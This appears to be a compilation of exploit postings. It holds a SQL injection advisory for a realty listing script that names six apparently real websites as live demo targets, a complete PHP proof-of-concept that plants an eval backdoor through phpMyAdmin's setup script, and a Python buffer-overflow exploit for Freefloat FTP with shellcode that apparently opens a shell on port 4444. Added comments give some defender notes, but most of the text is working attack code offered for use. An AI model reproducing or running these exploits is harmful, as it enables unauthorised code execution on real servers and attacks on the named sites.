Realty Listing System SQL Injection Vulnerability


Exploit In File

preview.php?id=
detail.php?id=

Demo Site
http://www.bundyinc.com/preview.php?id=1%27
http://clockworkrealty.com/preview.php?id=1%27
http://www.smithrealtyonline.com/preview.php?id=1%27
http://www.kenkoprealty.com/preview.php?id=1%27
http://www.zoellerag.com/preview.php?id=1%27
http://www.timandjim.com/preview.php?id=1%27

exploit
http://target/%5Bpath%5D/preview.php?id=1

or
http://target/%5Bpath%5D/detail.php?id=1

Demo
http://target/[path]/detail.php?id=1 Injection Here
http://target/[path]/preview.php?id=1 Injection Here

Remote Code Injection


 I tried to share what I know for whoever is interested...USE RESPONSIBLY.

<?php echo php_sapi_name()!=='cli'?'</pre>':'';
// Proof-of-concept for a phpMyAdmin setup-script code injection. Runs either
// from the CLI (base URL as argv[1]) or from a browser (base URL from the
// form rendered below).
// Defender notes: every step below depends on /setup/index.php still being
// reachable and on a config/ directory the web server can write to;
// phpMyAdmin's install instructions say to remove setup/ and config/ once
// configuration is done, which makes the 404 branch below the expected path.
// In web-server logs the observable trail is a request to /setup/index.php,
// a GET carrying a _SESSION[ConfigFile][Servers][...] query parameter, a
// POST to /setup/config.php, and a request to /config/config.inc.php?eval=.

if(php_sapi_name()==='cli'){
    // CLI mode: the base URL is the only argument.
    if(!isset($argv[1])){
        output("   Usage\n    ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
        killme();
    }
    $pmaurl = $argv[1];
}else{
    // Web mode: the base URL comes from the submitted form (empty until then).
    $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
// PHP snippet that the script tries to get written into the generated config
// file; once there it evaluates the contents of the "eval" query parameter.
$code   = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';
$cookie = null;
$token  = null;
// Every request below goes through the cURL extension.
if(!function_exists('curl_init')){
    output('[!] Fatal error. Need cURL!');
    killme();
}
$ch     = curl_init();
$debug  = 0;   // not referenced anywhere in the visible script
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=♥>
</form>
<pre>
<?php
// Web mode: render the form first and only continue once it was submitted.
if(!isset($_REQUEST['submit']))killme(true);
}

output("[i] Running...");

// Start a session and get a token
// One handle is reused for all requests. Response headers are included in
// the returned body (needed for the cookie regex below), and TLS peer/host
// verification is switched off, so an https target is accepted unchecked.
curl_setopt_array($ch, array(
    CURLOPT_URL => $pmaurl.'/setup/index.php',
    CURLOPT_HEADER => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 4,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
));
output("[*] Contacting server to retrive session cookie and token.");

$result = curl_exec($ch);
// A 404 on setup/index.php means the setup script is absent, which is the
// documented hardening state; nothing further is attempted.
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
    output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");
    killme();
}
if(!$result){
    output("[!] cURL error:".curl_error($ch));
    killme();
}
// This response text is taken to mean that there is no web-server-writable
// config/ directory, so the later "save" step could not succeed.
if(false !== strpos($result, 'Cannot load or save configuration')){
    output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");
    killme();
}

// Extract cookie
// The phpMyAdmin session cookie is taken from the Set-Cookie header text.
preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
output("[i] Cookie:".$cookie);
// Extract token
// The 32-hex-digit token is read from either a link or a hidden form field.
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
output("[i] Token:".$token);

// Poison _SESSION variable
// The GET below carries $code inside a _SESSION[ConfigFile][Servers][...]
// query parameter, presented with the session cookie and token obtained above.
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

// Save file
// POSTing submit_save asks the setup script to write its session-held
// configuration to disk.
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
output("[*] Contacting server to make it save the injected code to a file.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

// Verification: fetch the written config file with eval=echo md5(123) and
// look for md5("123") in the response; a hit means the snippet executed.
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');
curl_setopt($ch, CURLOPT_POST, 0);   // back to GET for this request
output("[*] Contacting server to test if the injected code executes.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}
if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){
    output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");
    output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");
}else{
    output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");
}

curl_close($ch);

/**
 * Print one status line and flush it so progress is visible while requests
 * are in flight. Under a web SAPI the text is HTML-escaped (it is printed
 * inside a <pre> block); under the CLI it is printed raw.
 *
 * @param string $msg  Line to print; a newline is appended.
 * @return void
 */
function output($msg){
    echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
    flush();
}

/**
 * Print an exit notice and terminate the script.
 *
 * Takes no parameters; the argument passed at the call site `killme(true)`
 * is ignored. Under a web SAPI a '<pre>' tag is echoed before dying.
 *
 * @return void  Never returns; ends with die().
 */
function killme(){
    output("[*] Exiting...");
    echo php_sapi_name()!=='cli'?'<pre>':'';
    die();
}

// Web mode only: trailing echo that pairs with the '</pre>' echoed at the top of the script.
echo php_sapi_name()!=='cli'?'<pre>':'';?>

Freefloat FTP [LIST] Buffer Overflow Exploit


Credit to underground Team @ inj3ctor… we juz do what we think is right to do in the virtual world..~~

 

 

#!/usr/bin/python
from struct import pack
import socket,sys
import os

# Banner. The script is Python 2 (print statements, byte-string literals).
print " ||=============================================================||"
print " ||                                                             ||"
print " ||      /      \    0-Exploit (Zer0 Thunder)                   ||"
print " ||   \  \  ,,  /  /--------------------------------------------||"
print " ||    '-.`\()/`.-'          ===========================        ||"
print " ||   .--_'(  )'_--.Freefloat FTP [LIST] Buffer Overflow Exploit||"
print " ||  / /` /`**`\ `\ \        ----pwn the shell----              ||"
print " ||   |  |  ><  |  |                                            ||"
print " ||   \  \      /  /                                            ||"
print " ||       '.__.'                                                ||"
print " ||                                                             ||"
print " ||=============================================================||"

# Exactly two positional arguments are required: host and TCP port.
if len(sys.argv) != 3:
    print "Usage: ./freeftp.py [IP] [PORT]"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])   # a non-numeric port raises ValueError here, uncaught

# String sent as the LIST argument: 246 bytes of 0x41 padding, a 4-byte
# little-endian value, a 20-byte run of 0x90, then an opaque byte blob whose
# behaviour is not described on the page beyond the later hint that something
# should be listening on TCP 4444 afterwards.
# Defender note: a LIST argument several hundred bytes long containing
# non-printable data is anomalous for FTP and is a usable detection signal,
# as is a new listener on TCP 4444 appearing after such a request.
junk = "\x41" * 246
add = pack('<L',0x77c35459)
nops = "\x90" * 20
shell= ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"
"\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"
"\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"
"\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"
"\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"
"\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"
"\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"
"\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"
"\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"
"\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"
"\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"
"\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"
"\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"
"\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"
"\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"
"\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"
"\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"
"\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"
"\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"
"\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"
"\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"
"\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"
"\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"
"\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
payload = junk+add+nops+shell

print "[+] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Bare except: any failure here, including KeyboardInterrupt, is reported as
# "didn't respond". socket.connect() returns None, so `connect` is never used.
try:
    connect=s.connect((target, port))
    print "[+] Target FTP Connected!"
except:
    print "[!] FTP didn't respond\n"
    sys.exit(0)

s.recv(1024)   # discard the server greeting

# Anonymous login; the reply codes are read and discarded, never checked.
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
print "[+] Sending payload..."
s.send('LIST ' + payload + '\r\n')
s.recv(1024)

print "[!] Exploit has been sent!. Please try telnet [target ip] 4444\n"

# Outcome heuristic: a further reply from the server is taken as "failed";
# any exception on recv (e.g. a reset connection) is taken as "success".
# A clean close makes recv() return '' without raising, which also lands in
# the "failed" branch.
try:
    s.recv(1024)
    print "[!] Exploit failed !."

except:
    print "[+] Pwned the shell !"

s.close()